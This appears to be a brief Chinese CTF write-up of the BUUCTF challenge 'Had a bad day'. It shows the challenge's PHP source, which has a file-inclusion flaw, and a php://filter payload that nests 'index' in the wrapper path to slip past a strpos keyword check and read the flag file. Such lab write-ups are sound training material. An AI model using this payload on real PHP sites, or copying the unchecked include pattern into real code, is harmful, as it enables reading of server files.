先看url,发现可能有注入
http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers
试试能不能查看index.php直接?category=index.php不行,试试伪协议
把.php去掉试试
base64解码
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
说明参数要包含woofers、meowers、index
试试读取flag文件
?category=php://filter/convert.base64-encode/index/resource=flag
base64解码
![[<span style='color:red;'>BSidesCF</span> <span style='color:red;'>2020</span>]Had a bad day1](https://img-blog.csdnimg.cn/direct/4b14d2ec64ce4e5eadac0bf63563e2d4.png)
![[<span style='color:red;'>BSidesCF</span> <span style='color:red;'>2020</span>]Had a bad day](https://img-blog.csdnimg.cn/direct/4259ab9634cf4c59813a5df76251937a.png)
![BUUCTF_[<span style='color:red;'>BSidesCF</span> <span style='color:red;'>2020</span>]Had a bad day](https://img-blog.csdnimg.cn/direct/e9fb937d5512478bb4d3e8bdc2db7d9a.png)
![web:[<span style='color:red;'>BSidesCF</span> <span style='color:red;'>2020</span>]Had a bad day(伪协议、协议嵌套利用、strpos()函数)](https://img-blog.csdnimg.cn/direct/e3e3613a47624c3581db316621b3acb2.png)
